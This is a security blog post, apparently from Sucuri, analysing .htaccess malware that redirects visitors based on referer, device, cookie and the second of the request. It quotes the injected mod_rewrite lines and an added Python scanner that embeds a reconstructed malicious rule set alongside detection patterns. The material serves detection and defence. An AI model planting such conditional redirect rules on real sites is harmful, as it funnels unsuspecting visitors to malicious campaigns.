Website Malware – Curious .htaccess Conditional Redirect Case

I really enjoy when I see different types of conditional redirects on compromised sites. They are really hard to detect and always lead to interesting investigations. Take a look at this last one we identified:

[Screenshot: Website Malware - Curious HTACCESS Payload]

The curious aspect is its use of a less common mod_rewrite feature: environment variables set with the E= flag. Most conditional injections rely only on the visitor's user agent (browser) or referer, but this one also leveraged the built-in TIME_SEC variable and a custom variable named VWM:


# E= sets an environment variable; %{TIME_SEC} is the seconds component of the server time (00-59)
RewriteRule .* - [E=cNL:%{TIME_SEC}]
# The redirect host is stored in a second variable rather than written into the redirect rule itself
RewriteRule .* - [E=VWM:oktovia.jonesatlarge.com]

The first rule assigns TIME_SEC (the two-digit seconds component of the server's current time, 00 to 59) to the cNL variable, and the second assigns the payload host to VWM. Variables set this way are read back in later directives as %{ENV:cNL} and %{ENV:VWM}, which is how the redirect target ends up depending on the second at which the request arrives rather than on the time of day.

For example, if the request arrives at 9:00:01 (seconds value 01), the visitor is redirected to one campaign ID (7522); at 9:00:02 (seconds value 02) the visitor is redirected to a different campaign ID, and so on for each of the 60 possible values.

Combine that with the other conditions this .htaccess malware imposes:

  1. It checks whether the referer is Google, Facebook, Twitter or one of a few other popular sites.
  2. It checks whether the operating system is Mac, Windows, iPhone, iPad, iPod or Android.
  3. It checks that the cookie cNL is not set (so the redirect is shown at most once to the same visitor).
  4. It uses the second of the request time to build a custom redirect URL.

and the result is very hard to detect, and harder still to enumerate every malicious URL involved.
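A way to turn the four checks above into a detection, as an added example that is not code from the post or from Sucuri: scan a .htaccess for the indicators the post describes (a time-seeded E= variable, referer and user-agent gates, a negated cookie condition, an external or variable-built redirect target), score the combination, and expand the time-seeded redirect target over all 60 seconds so the full URL set can be blocklisted. The sample file is constructed for this example: its two E= lines are the ones quoted above, while the RewriteCond lines, the final redirect rule and the `?a=` query format are assumptions modelled on the post's description, not the real injected file.

```python
"""Heuristic scanner for the .htaccess conditional-redirect pattern described
above (added example, not code from the post or from Sucuri). It flags the
indicators the post lists, then expands a time-seeded redirect target over
every value the variable can take so the whole URL set can be blocklisted."""
import itertools
import re

# Constructed sample. The two E= lines are the ones quoted in the post; the
# RewriteCond lines and the final redirect are assumptions modelled on the
# four checks the post describes, not the real injected file.
SAMPLE_HTACCESS = r"""
RewriteEngine On
RewriteBase /
RewriteRule .* - [E=cNL:%{TIME_SEC}]
RewriteRule .* - [E=VWM:oktovia.jonesatlarge.com]
RewriteCond %{HTTP_REFERER} (google|facebook|twitter|bing|yahoo)\. [NC]
RewriteCond %{HTTP_USER_AGENT} (macintosh|windows|iphone|ipad|ipod|android) [NC]
RewriteCond %{HTTP_COOKIE} !cNL= [NC]
RewriteRule .* http://%{ENV:VWM}/?a=%{ENV:cNL} [R=302,L,CO=cNL:1:%{HTTP_HOST}]
"""

# Constructed benign control: the stock WordPress front-controller rules.
CLEAN_HTACCESS = r"""
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
"""

# Each indicator is one of the traits the post describes. Any single one can
# appear in a legitimate file; the combination is what matters (see classify).
INDICATORS = [
    ("time_env_var", re.compile(r"\[[^\]]*E=\w+:%\{TIME_", re.I)),
    ("referer_gate", re.compile(r"RewriteCond\s+%\{HTTP_REFERER\}.*(google|facebook|twitter|bing|yahoo)", re.I)),
    ("os_gate", re.compile(r"RewriteCond\s+%\{HTTP_USER_AGENT\}.*(windows|mac|iphone|ipad|ipod|android)", re.I)),
    ("cookie_negated", re.compile(r"RewriteCond\s+%\{HTTP_COOKIE\}\s+!", re.I)),
    ("external_redirect", re.compile(r"RewriteRule\s+\S+\s+https?://.*\[[^\]]*\bR\b", re.I)),
    ("env_in_target", re.compile(r"RewriteRule\s+\S+\s+\S*%\{ENV:", re.I)),
]

ENV_ASSIGN = re.compile(r"\b(?:E|env)=(\w+):([^,\]]+)", re.I)   # E=NAME:VALUE flag
REDIRECT_TARGET = re.compile(r"^RewriteRule\s+\S+\s+(\S+)\s+\[[^\]]*\bR\b", re.I)
# Ranges the mod_rewrite TIME_* variables can take; mod_rewrite zero-pads them to two digits.
TIME_RANGES = {"TIME_SEC": range(60), "TIME_MIN": range(60), "TIME_HOUR": range(24)}


def scan_htaccess(text):
    """Return (line_number, indicator_name, line) for every directive matching an indicator."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        for name, pattern in INDICATORS:
            if pattern.search(line):
                hits.append((lineno, name, line))
    return hits


def classify(hits):
    """Score on the combination: visitor gating plus a redirect out of the site."""
    kinds = {name for _, name, _ in hits}
    gating = {"referer_gate", "os_gate", "cookie_negated"}
    redirect = {"external_redirect", "env_in_target"}
    if kinds & redirect and len(kinds & gating) >= 2:
        return "likely conditional redirect malware"
    if "time_env_var" in kinds or kinds & redirect:
        return "suspicious"
    return "clean"


def expand_targets(text):
    """Expand every redirecting RewriteRule target over all values of its time-seeded variables."""
    static, timed, targets = {}, {}, []
    for line in text.splitlines():
        line = line.strip()
        for name, value in ENV_ASSIGN.findall(line):
            time_var = re.search(r"%\{(TIME_\w+)\}", value)
            if time_var and time_var.group(1) in TIME_RANGES:
                timed[name] = time_var.group(1)
            else:
                static[name] = value
        match = REDIRECT_TARGET.match(line)
        if match:
            targets.append(match.group(1))
    names = sorted(timed)
    urls = []
    for target in targets:
        for combo in itertools.product(*(TIME_RANGES[timed[n]] for n in names)):
            values = dict(static)
            values.update({n: f"{v:02d}" for n, v in zip(names, combo)})
            urls.append(re.sub(r"%\{ENV:(\w+)\}",
                               lambda m, v=values: v.get(m.group(1), m.group(0)), target))
    return urls


if __name__ == "__main__":
    found = scan_htaccess(SAMPLE_HTACCESS)
    for lineno, name, line in found:
        print(f"{lineno:3} {name:18} {line}")
    print(classify(found))
    print(len(expand_targets(SAMPLE_HTACCESS)), "candidate redirect URLs, e.g.",
          expand_targets(SAMPLE_HTACCESS)[1])
```

The scanner keys on the combination of gates plus a redirect that leaves the site, because a referer or user-agent condition on its own is common in legitimate files. `expand_targets` relies on mod_rewrite zero-padding TIME_SEC to two digits, which is why the post's "01" and "02" values appear; it does not resolve a variable defined in terms of another `%{ENV:...}` variable, so a target assembled across several E= assignments would need that chain followed by hand.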

Very sneaky…

Via Sucuri.net
